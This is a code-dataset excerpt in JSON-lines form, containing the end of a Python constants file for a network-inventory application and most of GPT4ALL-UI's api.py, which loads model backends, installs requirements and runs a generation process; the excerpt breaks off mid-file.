'nokia siemens networks'\nMANUFACTURE_SIE = MANUFACTURE_NSN\nMANUFACTURE_SUP = PE_VENDOR_SUP\nMANUFACTURE_UTP = 'google'\n\n# PathElement Interface Components.\nPE_INTF_CHASSIS = 'chassis'\nPE_INTF_LINECARD = 'linecard'\nPE_INTF_MODULE = 'module'\nPE_INTF_PORT = 'port'\n\n# Device name delimiters.\nDEV_NAME_DELIMITERS = r'-: '\nDEV_NAME_DELIMITERS_INFINERA = r'-: \\.'\n\n# Device Reconciliation.\nDEVICE_RECON_DEV_NAME_OPT_OUT_REGEX = 'DEVICE_RECON_DEV_NAME_OPT_OUT_REGEX'\nDEVICE_RECON_DEV_TYPE_OPT_OUT_REGEX = 'DEVICE_RECON_DEV_TYPE_OPT_OUT_REGEX'\nDEVICE_RECON_PART_NAME_OPT_IN_REGEX = 'DEVICE_RECON_PART_NAME_OPT_IN_REGEX'\nDEVICE_RECON_RESET_SEQUENCE = 'DEVICE_RECON_RESET_SEQUENCE'\nDEVICE_RECON_MULTI_CHASSIS_DEV_TYPES = 'DEVICE_RECON_MULTI_CHASSIS_DEV_TYPES'\nDEVICE_RECON_NETWORKING_POPT_TYPE_REGEX = (\n 'DEVICE_RECON_NETWORKING_POPT_TYPE_REGEX')\n\n# Email Subscriptions.\nCREATION_NOTIFICATION_EMAILS = 'CREATION_NOTIFICATION_EMAILS_'\n\n# View constants.\nJSON_CONTENT_TYPE = 'application/json; charset=utf-8'\n\n# Service account suffix.\nSA_ACCOUNT_SUFFIX = 'gserviceaccount.com'\n\n# Cache key qualifiers.\nPART_NAME_UNIQUE_CHECK = 'Part.name-uniquecheck'\n\n# Spectrum frequency digits.\nSPECTRUM_FREQ_DIGITS = 4\n\n# Force init of SpectrumDesign to set templates.\nSPECTRUM_DESIGN_FORCE_INIT_TEMPLATE = 
'SPECTRUM_DESIGN_FORCE_INIT_TEMPLATE'\n\n# Default power consumption for Parts.\nDEFAULT_POWER_CONSUMPTION = 0.0\n\n# Power fields in searching Part model for power rollups.\nPARTS_POWER_FIELDS = ['nebs_25c_watts',\n 'nebs_40c_watts',\n 'nebs_55c_watts',\n 'tested_80f_watts',\n 'tested_90f_watts',\n 'tested_100f_watts',\n 'actual_power_w']\n\n# Maximum number of children to search for child Part in Device Templates.\nMAX_DEVICEPART_LEVEL_SEARCH = 10\nMIN_RU = 0.5\n\n# The name of a setting in the admin UI, a list of log_codes that will not\n# generate emails.\nSETTING_LOGGING_MUTE = 'LOGGING_MUTE'\n\n# The name of a setting in the admin UI, int, duration in seconds over which to\n# debounce emails.\nERROR_LOGGING_DEBOUNCE_TIME = 'ERROR_LOGGING_DEBOUNCE_TIME'\n\n# Default value for ERROR_LOGGING_DEBOUNCE_TIME setting.\nDEFAULT_ERROR_LOGGING_DEBOUNCE_TIME = 60 * 5\n\nFLOOR_NUMBER = 'floor_number'\n\n# Circuit constants.\nCIRCUIT_FORCE_INIT = 'CIRCUIT_FORCE_INIT'\nCIRCUIT_PE_TO_CE_FILTER_POP_A = 'CIRCUIT_PE_TO_CE_FILTER_POP_A'\nCIRCUIT_ID_RESET_SEQUENCE = 'CIRCUIT_ID_RESET_SEQUENCE'\n\nCIRCUIT_ID_PREFIX_FOR_CHIPMUNK = 'C'\nCIRCUIT_ID_PREFIX_FOR_DOUBLEHELIX = 'D'\nCIRCUIT_ID_DELIM = '-'\nCIRCUIT_ACT_PATH_NOTE = 'ACT path'\nCIRCUIT_PORT_NAME_PREFIX = r'port-'\nCIRCUIT_PORT_NAME_ALPHA_NUMERIC_REGEX = r'^([A-Z]+)(\\d+)$'\nCIRCUIT_RAW_PATH_DELIM = ':'\nCIRCUIT_RAW_PATH_WITH_HWOPS = 'CIRCUIT_RAW_PATH_WITH_HWOPS'\nCIRCUIT_ACT_PATH_BUCKET = 'doublehelix-act-path-'\nCIRCUIT_ACT_UNM_PATH_MODEL = 'UNM_PATHS_MODEL'\n\n# Settings related to ACT circuit.\nACT_SETTING_STOAT_RPC_DEADLINE = 'ACT_SETTING_STOAT_RPC_DEADLINE'\nACT_SETTING_STOAT_TRANSIENT_ERRORS = 'ACT_SETTING_STOAT_TRANSIENT_ERRORS'\nACT_SETTING_UNM_PATHS_BATCH_SIZE = 'ACT_SETTING_UNM_PATHS_BATCH_SIZE'\n\nACT_TEST_EK_PHYSICAL_PACKET_LINKS = 'ACT_TEST_EK_PHYSICAL_PACKET_LINKS'\nACT_TEST_PATHS_MODEL_FILE_NAME = 'ACT_TEST_PATHS_MODEL_FILE_NAME'\n\nCHIPMUNK_PROXY_BLADE = 'blade:stoat-chipmunk-proxy-prod'\nCHIPMUNK_SANDBOX_BLADE = 'blade:stoat-chipmunk-proxy-sandbox'\nPATH_VALIDATION_BLADE = 'blade:stoat-prod-path-validation'\nDISABLE_STOAT_VALIDATION_SETTING = 'DISABLE_STOAT_VALIDATION'\nUSE_STOAT_PROD_PROXY_IN_NON_PROD_SETTING = 'USE_STOAT_PROD_PROXY_IN_NON_PROD'\n\nPORT_STATUS_UPDATE_MUTEX_EXP_TIME_SEC = (\n 'PORT_STATUS_UPDATE_MUTEX_EXP_TIME_SEC')\nPORT_STATUS_UPDATE_MUTEX_EXP_TIME_SEC_DEFAULT = 300\nPORT_STATUS_UPDATE_MUTEX_ACQUIRE_TIME_SEC = (\n 'PORT_STATUS_UPDATE_MUTEX_ACQUIRE_TIME_SEC')\nPORT_STATUS_UPDATE_MUTEX_ACQUIRE_TIME_SEC_DEFAULT = 900\n\nCIRCUIT_PARENT_UPDATE_MUTEX_EXP_TIME_SEC = (\n 'CIRCUIT_PARENT_UPDATE_MUTEX_EXP_TIME_SEC')\nCIRCUIT_PARENT_UPDATE_MUTEX_EXP_TIME_SEC_DEFAULT = 300\nCIRCUIT_PARENT_UPDATE_MUTEX_ACQUIRE_TIME_SEC = (\n 'CIRCUIT_PARENT_UPDATE_MUTEX_ACQUIRE_TIME_SEC')\nCIRCUIT_PARENT_UPDATE_MUTEX_ACQUIRE_TIME_SEC_DEFAULT = 900\n\nCIRCUIT_PARENT_CREATE_MUTEX_EXP_TIME_SEC = (\n 'CIRCUIT_PARENT_CREATE_MUTEX_EXP_TIME_SEC')\nCIRCUIT_PARENT_CREATE_MUTEX_EXP_TIME_SEC_DEFAULT = 100\nCIRCUIT_PARENT_CREATE_MUTEX_ACQUIRE_TIME_SEC = (\n 'CIRCUIT_PARENT_CREATE_MUTEX_ACQUIRE_TIME_SEC')\nCIRCUIT_PARENT_CREATE_MUTEX_ACQUIRE_TIME_SEC_DEFAULT = 100\n\n# Port reservations.\nPORT_RESERVATION_MUTEX_EXP_TIME_SEC = (\n 'PORT_RESERVATION_MUTEX_EXP_TIME_SEC')\nPORT_RESERVATION_MUTEX_EXP_TIME_SEC_DEFAULT = 600\nPORT_RESERVATION_MUTEX_ACQUIRE_TIME_SEC = (\n 'PORT_RESERVATION_MUTEX_ACQUIRE_TIME_SEC')\nPORT_RESERVATION_MUTEX_ACQUIRE_TIME_SEC_DEFAULT = 600\nNOT_FOUND = 'Not found'\n\n# Capacity\nCAPACITY_TRANSIT_SITE = 'site'\n\n# Constants key for 
rack copy parameters.\nSOURCE_KEY_NAME = 'source_key_name'\nTARGET_SPACE_KEY_NAME = 'target_space_key_name'\nNUMBER_OF_RACKS = 'number_of_racks'\nNEW_RACK_STATUS = 'new_rack_status'\nTARGET_NAME = 'target_name'\n\n# Setting constant for groups with default write access.\nLDAP_GROUPS_DEFAULT_WRITE = 'LDAP_GROUPS_DEFAULT_WRITE'\nEVERYONE_DEFAULT_READ = '%everyone'\nALL_LDAP_GROUPS = 'LDAP_GROUPS'\nREAD_OP = 'read'\nWRITE_OP = 'write'\n\n# Floor name formats.\nBASEMENT_NAME_FORMAT = '%s.B%d'\nBASEMENT_SUBBUILDING_NAME_FORMAT = '%s.' + BASEMENT_NAME_FORMAT\nFLOOR_NAME_FORMAT = '%s.F%d'\nFLOOR_SUBBUILDING_NAME_FORMAT = '%s.' + FLOOR_NAME_FORMAT\n\n# Actions.\nDELETED = 'deleted'\n\n# Settings for admin groups for updating permissions.\nLIST_ADMIN_GROUPS_PERMISSIONS_UPDATE = 'LIST_ADMIN_GROUPS_PERMISSIONS_UPDATE'\nDEFAULT_ADMIN_GROUPS_PERMISSIONS_UPDATE = ['doublehelix-admin']\n\n# Setting name of list of email addresses that should receive emails\n# about \"empty\" metadata that can be deleted.\nCLEAN_METADATA_EMAIL_RECIPIENTS = 'CLEAN_METADATA_EMAIL_RECIPIENTS'\n\n# Building.\nBUILDING_NAME_FORMAT = '%s%d'\n\n# Space.\nSPACE_NAME_FORMAT = '%s.S%d'\nSPACE_DELIMITER = '.S'\n\n# SubBuilding FQN format.\nSUBBUILDING_FQN_FORMAT = '%s:%s'\n\n# Vendor Patch Panel and Splice Closure name format.\nVENDOR_CATEGORY_NAME_FORMAT = '%s-%s'\n\nCOPPER_PANEL_NAME_FORMAT = VENDOR_CATEGORY_NAME_FORMAT\n\nCOMMISSIONING_STATUS = 'commissioning_status'\n\nPROJECT_ID_PATTERN = re.compile(r'^(prj|del|req|pgm|tsk)-\\d{1,6}$')\n\n# Mail template names\nBOM_CANCEL = 'BOM_CANCEL'\nBOM_ORDER = 'BOM_ORDER'\nBOM_REVIEW = 'BOM_REVIEW'\nCLEAN_METADATA = 'CLEAN_METADATA'\nCLEAN_ENTITIES = 'clean_entities'\nENTITY_SUBSCRIPTION = 'ENTITY_SUBSCRIPTION'\nKIND_CREATION_NOTIFICATION = 'KIND_CREATION_NOTIFICATION'\nLOG_SERVICE_EMAIL_TEMPLATE = 'LOG_SERVICE'\nORDER_STATUS_CHANGE = 'ORDER_STATUS_CHANGE'\nORDER_CURRENT_COMMIT_DATE_CHANGE = 'ORDER_CURRENT_COMMIT_DATE_CHANGE'\nORDER_ONSITE_REQUEST_DATE_CHANGE = 'ORDER_ONSITE_REQUEST_DATE_CHANGE'\nORDER_ITEM_CANCEL = 'ORDER_ITEM_CANCEL'\nORDER_ITEM_CURRENT_COMMIT_DATE_CHANGE = 'ORDER_ITEM_CURRENT_COMMIT_DATE_CHANGE'\nORDER_ITEM_ONSITE_REQUEST_DATE_CHANGE = 'ORDER_ITEM_ONSITE_REQUEST_DATE_CHANGE'\nORDER_STATUS_VALUES = ['Received', 'Scheduled', 'Hold', 'Canceled',\n 'ReleasedToWarehouse', 'ShipPerCommitDate',\n 'ApprovedForPartialShipping', 'Shipped', 'Delivered']\n\n# Device naming related constants.\n# Space function values in the db.\nSPACE_FUNCTION_VALUE_SERVER_FLOOR = 'DC Server Floor'\nSPACE_FUNCTION_VALUE_SSNR = 'SSNR'\nSPACE_FUNCTION_VALUE_CNR = 'CNR' # Logic uses 'in' to handle both CCNR/CNR.\nSPACE_FUNCTION_VALUE_CCNR = 'CCNR'\nSPACE_FUNCTION_VALUE_CORP = 'Corp'\nSPACE_FUNCTION_VALUE_POE = 'Point Of Entry'\n# Enable GTAPE and FSA when requested.\nSPACE_FUNCTION_VALUE_GTAPE = '-do-not-match' # 'Gtape'\nSPACE_FUNCTION_VALUE_FSA = '-do-not-match' # 'Fsa'\n\n# Space function prefix used for naming the device.\nSPACE_FUNCTION_PREFIX_SERVER_FLOOR = 'SPP'\nSPACE_FUNCTION_PREFIX_SSNR = 'PP' # No prefix before PP.\nSPACE_FUNCTION_PREFIX_CNR = 'CPP'\nSPACE_FUNCTION_PREFIX_GTAPE = 'GPP'\nSPACE_FUNCTION_PREFIX_FSA = 'FPP'\n\n# Mapping of space function naming codes to space function values in db.\nSPACE_FUNCTION_DICT = dict(zip(\n (SPACE_FUNCTION_PREFIX_SERVER_FLOOR,\n SPACE_FUNCTION_PREFIX_SSNR,\n SPACE_FUNCTION_PREFIX_CNR, # Shared for both CNR and CCNR.\n SPACE_FUNCTION_PREFIX_GTAPE,\n SPACE_FUNCTION_PREFIX_FSA),\n (SPACE_FUNCTION_VALUE_SERVER_FLOOR,\n SPACE_FUNCTION_VALUE_SSNR,\n 
SPACE_FUNCTION_VALUE_CNR,\n SPACE_FUNCTION_VALUE_GTAPE,\n SPACE_FUNCTION_VALUE_FSA)))\n\n# Abbreviations used in the Port Capacity and Usage report.\n# At this time only one is abbreviated.\nSPACE_FUNCTION_ABBREVIATIONS = dict(zip(\n (SPACE_FUNCTION_VALUE_SERVER_FLOOR,\n SPACE_FUNCTION_VALUE_SSNR,\n SPACE_FUNCTION_VALUE_CNR,\n SPACE_FUNCTION_VALUE_CCNR,\n SPACE_FUNCTION_VALUE_CORP,\n SPACE_FUNCTION_VALUE_GTAPE,\n SPACE_FUNCTION_VALUE_FSA),\n ('SF',\n SPACE_FUNCTION_VALUE_SSNR,\n SPACE_FUNCTION_VALUE_CNR,\n SPACE_FUNCTION_VALUE_CCNR,\n SPACE_FUNCTION_VALUE_CORP,\n SPACE_FUNCTION_VALUE_GTAPE,\n SPACE_FUNCTION_VALUE_FSA)))\n\n# Automated device naming is dependent on the rmu.\nMAX_RMU = 45\nMAX_NGF_RAILS = 2\n# This pair of constants determine the name of the HWOPS device.\nRMUS = (36, 29, 22, 15, 8, 1) # The code depends on decreasing order.\nHWOPS_RACK_NAMES = ['ABCDEF', 'GHIJKL']\n# Rack type required for HWOPS Splice Closure naming and fqn.\nRACK_OMX_CABINET_PREFIX = 'cabinet OMX'\n\nSEQUENCING_ATTR_FORMAT = '%s%06d'\n\n# References constants.\nREFERENCE_CLUSTER = 'cluster'\nREFERENCE_CLUSTER_ID = 'cluster_id'\nREFERENCE_FUNCTION = 'function'\nREFERENCE_LEVEL = 'level'\nREFERENCE_METRO_PAIR = 'metro_pair'\nREFERENCE_METRO_SCOPE = 'metro_scope'\nREFERENCE_NEIGHBORHOOD = 'neighborhood'\nREFERENCE_POP_SCOPE = 'pop_scope'\n\nREFERENCE_DEVICE = 'device'\nREFERENCE_INTER_METRO = 'inter-metro'\nREFERENCE_METRO = 'metro'\nREFERENCE_NAME = 'name'\nREFERENCE_PATH = 'path'\nREFERENCE_PEER = 'peer'\nREFERENCE_POP = 'pop'\nREFERENCE_ROLE = 'role'\nREFERENCE_SITE = 'site'\nREFERENCE_TRANSIT = 'transit'\n\nREFERENCE_B2_NETWORK = 'b2'\nREFERENCE_B4_NETWORK = 'b4'\n\n# Constants for fallout.\nRUNTIME_ERROR = '__runtime__'\nRUNTIME = 'RUNTIME'\nWARNING = 'WARNING'\nERROR = 'ERROR'\nVALIDATOR_CONTROLLER = 'CONTROLLER'\nVALIDATOR_METADATA = 'METADATA'\nFALLOUT_FIELDS = 'FALLOUT_FIELDS'\n\n# Building constants.\nBUILDING_TYPE_GOOGLE_DATA_CENTER = 'Google Data Center'\n\n# Supply Chain constants.\nLABELS = 'labels'\nPIPELINE_ID = 'pipeline_id'\n\n# Bazooka constants.\nGUNS = 'GUNS'\nPARENT_GUNS = 'PARENT_GUNS'\nPARENT_KEY_NAME = 'parent_key_name'\nBZ_DELETE_SYNC_HISTORY = 'BZ_DELETE_SYNC_HISTORY'\n\n# DataPropagation Constants.\nDPEVENT_VALUECHANGED = 'value_changed'\nDPEVENT_VALUEADD = 'value_added'\nDPEVENT_VALUEDEL = 'value_deleted'\nDPEVENT_VALUEINC = 'value_increased'\nDPEVENT_VALUEDEC = 'value_decreased'\nDPMETA_TRIGGER = 'trigger'\n\n# Fiber connection constants.\nBATCH_FIBER_CONNECTIONS_REQUEST = 'fiber_connections'\nFIBER_CONNECTION = 'FiberConnection'\nA_SPLICE_KEY_NAME = 'a_splice_key_name'\nSTRAND_SPLICE_LIST = 'strand_splice_list'\nSTRAND_KEY_NAME = 'strand_key_name'\nSPLICE_KEY_NAME = 'splice_key_name'\nFIBER_CONNECTION_FIELDS = (A_SPLICE_KEY_NAME, STRAND_SPLICE_LIST)\nTYPE_NAME_FIBER = 'Fiber'\nTYPE_NAME_SPLICE_FOR_FIBERS = 'Splice for Fibers'\nTYPE_NAME_EDGE_SPLICE = 'Edge Splice'\n\n# Test related constants.\n# This environment variable is set during coverage runs.\nBULK_COVERAGE_RUN = 'BULK_COVERAGE_RUN'\nTEST_METHOD_PREFIX = 'test' # Prefix of methods that are tests.\n\n# Logging constants.\nLOG_CODE = 'log_code'\nLOG_TYPE = 'log_type'\nMESSAGE = 'message'\nENTITY_KIND = 'entity_kind'\nDATA = 'data'\nENVIRONMENT = 'env'\nAPP_IDENTITY = 'app_id'\n\nCREATE_OP = 'Create'\nDELETE_OP = 'Delete'\n\nCONNECTOR_TYPES = 'connector_types'\nCSVIMPORT_LOG = 'User %s has performed a legacy CSV import on kind %s.'\n\n# Local devappserver grouper groups\nLOCAL_DEVAPPSERVER_GROUPER_FILE = 
'localdevappservergrouper.json'\nREAD_ONLY = 'readonly'\nNO_READ = 'noread'\nOTHER = 'other'\nGROUPS = 'groups'\n\n# Miscellaneous.\nNA = 'N/A'\n\n# Patch Panel Notification constants.\nNEW_TEMPLATE = 'new_template'\nOLD_TEMPLATE = 'old_template'\nPATCH_PANEL_TEMPLATE_NOTIFY = 'PATCH_PANEL_TEMPLATE_NOTIFY'\nPANEL_NAME = 'panel_name'\nPANEL_KEY_NAME = 'panel_key_name'\nPATCH_PANEL_NOTIFY_EMAIL_SETTING = 'PATCH_PANEL_NOTIFY_EMAIL'\nPATCH_PANEL_NOTIFY_DEFAULT_TO_ADDRESS = 'fnd@google.com'\n\nPATCHPANEL_UPDATE_EMAIL_TEMPLATE = {\n 'name': PATCH_PANEL_TEMPLATE_NOTIFY,\n 'description': 'Email template for notifying change in patch panel'\n ' template.',\n 'to': [],\n 'cc': [],\n 'subject': 'Patch Panel Template Updates: {{timestamp}}',\n 'body': (''\n 'The following updates have been made to Patch Panels.
    '\n 'No.'\n ''\n ''\n '{{content}}
    Panel NamePanel key_nameUpdated OnUpdated ByNew TemplateOld Template

    '\n 'Please make the corresponding changes in Netcracker.'\n '

    Thank you.'\n '')\n}\n\n# POR Kinds.\nBTP_TABLES = ['B2B4POR_20141223', 'DRPOR_20150102',\n 'MetroPOR_20150127', 'FPOR_20150826']\n\n# Flag to decide whether to update stoat paths for\n# handling broken ports.\nUPDATE_STOAT_PATHS_FOR_BROKEN_PORTS = 'UPDATE_STOAT_PATHS_FOR_BROKEN_PORTS'\n\n# SCULPTOR BLADE ADDRESS\nSCULPTOR_PROD = 'blade:network-config-orchestrator'\nSCULPTOR_SANDBOX = 'blade:network-config-orchestrator-sandbox'\n\n# Stoat path elements\nA_END_OLD_PE = 'a_end_old_pe'\nA_END_NEW_PE = 'a_end_new_pe'\nZ_END_OLD_PE = 'z_end_old_pe'\nZ_END_NEW_PE = 'z_end_new_pe'\nSIMPLEX = 'SIMPLEX'\nDUPLEX = 'DUPLEX'\n\nZ_ENDS = 'z_ends'\n","repo_name":"craigholland/airbus_coremods","sub_path":"_base/utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":55546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31361599516","text":"######\n# Project : GPT4ALL-UI\n# File : api.py\n# Author : ParisNeo with the help of the community\n# Supported by Nomic-AI\n# license : Apache 2.0\n# Description : \n# A simple api to communicate with gpt4all-ui and its models.\n######\nfrom datetime import datetime\nfrom gpt4all_api.db import DiscussionsDB\nfrom pathlib import Path\nimport importlib\nfrom pyaipersonality import AIPersonality\nimport multiprocessing as mp\nimport threading\nimport time\nimport requests\nfrom tqdm import tqdm \nimport traceback\n\n__author__ = \"parisneo\"\n__github__ = \"https://github.com/nomic-ai/gpt4all-ui\"\n__copyright__ = \"Copyright 2023, \"\n__license__ = \"Apache 2.0\"\n\n\n\nimport subprocess\nimport pkg_resources\n\n\n# ===========================================================\n# Manage automatic install scripts\n\ndef is_package_installed(package_name):\n try:\n dist = pkg_resources.get_distribution(package_name)\n return True\n except pkg_resources.DistributionNotFound:\n return False\n\n\ndef install_package(package_name):\n try:\n # Check if the package is already installed\n __import__(package_name)\n print(f\"{package_name} is already installed.\")\n except ImportError:\n print(f\"{package_name} is not installed. 
Installing...\")\n \n # Install the package using pip\n subprocess.check_call([\"pip\", \"install\", package_name])\n \n print(f\"{package_name} has been successfully installed.\")\n\n\ndef parse_requirements_file(requirements_path):\n with open(requirements_path, 'r') as f:\n for line in f:\n line = line.strip()\n if not line or line.startswith('#'):\n # Skip empty and commented lines\n continue\n package_name, _, version_specifier = line.partition('==')\n package_name, _, version_specifier = line.partition('>=')\n if is_package_installed(package_name):\n # The package is already installed\n print(f\"{package_name} is already installed.\")\n else:\n # The package is not installed, install it\n if version_specifier:\n install_package(f\"{package_name}{version_specifier}\")\n else:\n install_package(package_name)\n\n\n# ===========================================================\n\n\nclass ModelProcess:\n def __init__(self, config=None):\n self.config = config\n self.generate_queue = mp.Queue()\n self.generation_queue = mp.Queue()\n self.cancel_queue = mp.Queue(maxsize=1)\n self.clear_queue_queue = mp.Queue(maxsize=1)\n self.set_config_queue = mp.Queue(maxsize=1)\n self.set_config_result_queue = mp.Queue(maxsize=1)\n self.started_queue = mp.Queue()\n self.process = None\n self.is_generating = mp.Value('i', 0)\n self.model_ready = mp.Value('i', 0)\n self.ready = False\n \n self.id=0\n self.n_predict=2048\n\n self.reset_config_result()\n\n def reset_config_result(self):\n self._set_config_result = {\n 'status': 'succeeded',\n 'backend_status':'ok',\n 'model_status':'ok',\n 'personality_status':'ok',\n 'errors':[]\n }\n \n def load_backend(self, backend_name:str, install=False):\n backend_path = Path(\"backends\")/backend_name\n if install:\n # first find out if there is a requirements.txt file\n install_file_name=\"install.py\"\n install_script_path = backend_path / install_file_name \n if install_script_path.exists():\n module_name = install_file_name[:-3] # Remove the \".py\" extension\n module_spec = importlib.util.spec_from_file_location(module_name, str(install_script_path))\n module = importlib.util.module_from_spec(module_spec)\n module_spec.loader.exec_module(module)\n if hasattr(module, \"Install\"):\n module.Install(self)\n\n # define the full absolute path to the module\n absolute_path = backend_path.resolve()\n\n # infer the module name from the file path\n module_name = backend_path.stem\n\n # use importlib to load the module from the file path\n loader = importlib.machinery.SourceFileLoader(module_name, str(absolute_path/\"__init__.py\"))\n backend_module = loader.load_module()\n backend_class = getattr(backend_module, backend_module.backend_name)\n return backend_class\n\n def start(self):\n if self.process is None:\n self.process = mp.Process(target=self._run)\n self.process.start()\n\n def stop(self):\n if self.process is not None:\n self.generate_queue.put(None)\n self.process.join()\n self.process = None\n\n def set_backend(self, backend_path):\n self.backend = backend_path\n\n def set_model(self, model_path):\n self.model = model_path\n \n def set_config(self, config):\n self.set_config_queue.put(config)\n # Wait for it t o be consumed\n while self.set_config_result_queue.empty():\n time.sleep(0.5)\n return self.set_config_result_queue.get()\n\n def generate(self, full_prompt, prompt, id, n_predict):\n self.generate_queue.put((full_prompt, prompt, id, n_predict))\n\n def cancel_generation(self):\n self.cancel_queue.put(('cancel',))\n\n def clear_queue(self):\n 
self.clear_queue_queue.put(('clear_queue',))\n \n def rebuild_backend(self, config):\n try:\n print(\" ******************* Building Backend from main Process *************************\")\n backend = self.load_backend(config[\"backend\"], install=True)\n print(\"Backend loaded successfully\")\n except Exception as ex:\n print(\"Couldn't build backend.\")\n print(ex)\n backend = None\n self._set_config_result['backend_status'] ='failed'\n self._set_config_result['errors'].append(f\"couldn't build backend:{ex}\")\n return backend\n \n def _rebuild_model(self):\n try:\n print(\" ******************* Building Backend from generation Process *************************\")\n self.backend = self.load_backend(self.config[\"backend\"], install=True)\n print(\"Backend loaded successfully\")\n try:\n model_file = Path(\"models\")/self.config[\"backend\"]/self.config[\"model\"]\n print(f\"Loading model : {model_file}\")\n self.model = self.backend(self.config)\n self.model_ready.value = 1\n print(\"Model created successfully\\n\")\n except Exception as ex:\n traceback.print_exc()\n print(\"Couldn't build model\")\n print(ex)\n self.model = None\n self._set_config_result['model_status'] ='failed'\n self._set_config_result['errors'].append(f\"couldn't build model:{ex}\")\n except Exception as ex:\n traceback.print_exc()\n print(\"Couldn't build backend\")\n print(ex)\n self.backend = None\n self.model = None\n\n def rebuild_personality(self):\n try:\n print(\" ******************* Building Personality from main Process *************************\")\n personality_path = f\"personalities/{self.config['personality_language']}/{self.config['personality_category']}/{self.config['personality']}\"\n personality = AIPersonality(personality_path, run_scripts=False)\n print(f\" ************ Personality {personality.name} is ready (Main process) ***************************\")\n except Exception as ex:\n print(f\"Personality file not found or is corrupted ({personality_path}).\\nPlease verify that the personality you have selected exists or select another personality. Some updates may lead to change in personality name or category, so check the personality selection in settings to be sure.\")\n if self.config[\"debug\"]:\n print(ex)\n personality = AIPersonality()\n \n return personality\n \n def _rebuild_personality(self):\n try:\n print(\" ******************* Building Personality from generation Process *************************\")\n personality_path = f\"personalities/{self.config['personality_language']}/{self.config['personality_category']}/{self.config['personality']}\"\n self.personality = AIPersonality(personality_path)\n print(f\" ************ Personality {self.personality.name} is ready (generation process) ***************************\")\n except Exception as ex:\n print(f\"Personality file not found or is corrupted ({personality_path}).\")\n print(f\"Please verify that the personality you have selected exists or select another personality. 
Some updates may lead to change in personality name or category, so check the personality selection in settings to be sure.\")\n print(f\"Exception: {ex}\")\n if self.config[\"debug\"]:\n print(ex)\n self.personality = AIPersonality()\n self._set_config_result['personality_status'] ='failed'\n self._set_config_result['errors'].append(f\"couldn't load personality:{ex}\")\n \n def step_callback(self, text, message_type):\n if message_type==0:\n self.generation_queue.put((text,self.id, message_type))\n \n def _run(self): \n self._rebuild_model()\n self._rebuild_personality()\n if self.model_ready.value == 1:\n self.n_predict = 1\n self._generate(\"I\",1)\n print()\n print(\"Ready to receive data\")\n else:\n print(\"No model loaded. Waiting for new configuration instructions\")\n \n self.ready = True\n print(f\"Listening on :http://{self.config['host']}:{self.config['port']}\")\n while True:\n try:\n self._check_set_config_queue()\n self._check_cancel_queue()\n self._check_clear_queue()\n\n if not self.generate_queue.empty():\n command = self.generate_queue.get()\n if command is None:\n break\n\n if self.cancel_queue.empty() and self.clear_queue_queue.empty():\n self.is_generating.value = 1\n self.started_queue.put(1)\n self.id=command[2]\n self.n_predict=command[3]\n if self.personality.processor is not None:\n if self.personality.processor_cfg is not None:\n if \"custom_workflow\" in self.personality.processor_cfg:\n if self.personality.processor_cfg[\"custom_workflow\"]:\n print(\"Running workflow\")\n output = self.personality.processor.run_workflow(self._generate, command[1], command[0], self.step_callback)\n self._callback(output)\n self.is_generating.value = 0\n continue\n\n self._generate(command[0], self.n_predict, self._callback)\n while not self.generation_queue.empty():\n time.sleep(1)\n self.is_generating.value = 0\n time.sleep(1)\n except Exception as ex:\n time.sleep(1)\n print(ex)\n\n def _generate(self, prompt, n_predict=50, callback=None):\n if self.model is not None:\n self.id = self.id\n if self.config[\"override_personality_model_parameters\"]:\n output = self.model.generate(\n prompt,\n new_text_callback=callback,\n n_predict=n_predict,\n temp=self.config['temperature'],\n top_k=self.config['top_k'],\n top_p=self.config['top_p'],\n repeat_penalty=self.config['repeat_penalty'],\n repeat_last_n = self.config['repeat_last_n'],\n seed=self.config['seed'],\n n_threads=self.config['n_threads']\n )\n else:\n output = self.model.generate(\n prompt,\n new_text_callback=callback,\n n_predict=self.n_predict,\n temp=self.personality.model_temperature,\n top_k=self.personality.model_top_k,\n top_p=self.personality.model_top_p,\n repeat_penalty=self.personality.model_repeat_penalty,\n repeat_last_n = self.personality.model_repeat_last_n,\n #seed=self.config['seed'],\n n_threads=self.config['n_threads']\n )\n else:\n print(\"No model is installed or selected. 
Please make sure to install a model and select it inside your configuration before attempting to communicate with the model.\")\n print(\"To do this: Install the model to your models/ folder.\")\n print(\"Then set your model information in your local configuration file that you can find in configs/local_default.yaml\")\n print(\"You can also use the ui to set your model in the settings page.\")\n output = \"\"\n return output\n\n def _callback(self, text):\n if not self.ready:\n print(\".\",end=\"\", flush=True)\n return True\n else:\n # Stream the generated text to the main process\n self.generation_queue.put((text,self.id, 0))\n self._check_set_config_queue()\n self._check_cancel_queue()\n self._check_clear_queue() \n # if stop generation is detected then stop\n if self.is_generating.value==1:\n return True\n else:\n return False\n\n def _check_cancel_queue(self):\n while not self.cancel_queue.empty():\n command = self.cancel_queue.get()\n if command is not None:\n self._cancel_generation()\n\n def _check_clear_queue(self):\n while not self.clear_queue_queue.empty():\n command = self.clear_queue_queue.get()\n if command is not None:\n self._clear_queue()\n\n def _check_set_config_queue(self):\n while not self.set_config_queue.empty():\n config = self.set_config_queue.get()\n if config is not None:\n print(\"Inference process : Setting configuration\")\n self.reset_config_result()\n self._set_config(config)\n self.set_config_result_queue.put(self._set_config_result)\n\n def _cancel_generation(self):\n self.is_generating.value = 0\n \n def _clear_queue(self):\n while not self.generate_queue.empty():\n self.generate_queue.get()\n\n def _set_config(self, config):\n bk_cfg = self.config\n self.config = config\n print(\"Changing configuration\")\n # Rebuild the model if the backend or the model file changed\n if self.config[\"backend\"]!=bk_cfg[\"backend\"] or self.config[\"model\"]!=bk_cfg[\"model\"]:\n self._rebuild_model()\n \n # Rebuild the personality if any personality setting changed\n if self.config[\"personality\"]!=bk_cfg[\"personality\"] or self.config[\"personality_category\"]!=bk_cfg[\"personality_category\"] or self.config[\"personality_language\"]!=bk_cfg[\"personality_language\"]:\n self._rebuild_personality()\n\n\nclass GPT4AllAPI():\n def __init__(self, config:dict, socketio, config_file_path:str) -> None:\n self.socketio = socketio\n #Create and launch the process\n self.process = ModelProcess(config)\n self.config = config\n \n self.backend = self.process.rebuild_backend(self.config)\n self.personality = self.process.rebuild_personality()\n if config[\"debug\"]:\n print(f\"{self.personality}\")\n self.config_file_path = config_file_path\n self.cancel_gen = False\n\n # Keeping track of current discussion and message\n self.current_discussion = None\n self._current_user_message_id = 0\n self._current_ai_message_id = 0\n self._message_id = 0\n\n self.db_path = config[\"db_path\"]\n\n # Create database object\n self.db = DiscussionsDB(self.db_path)\n\n # If the database is empty, 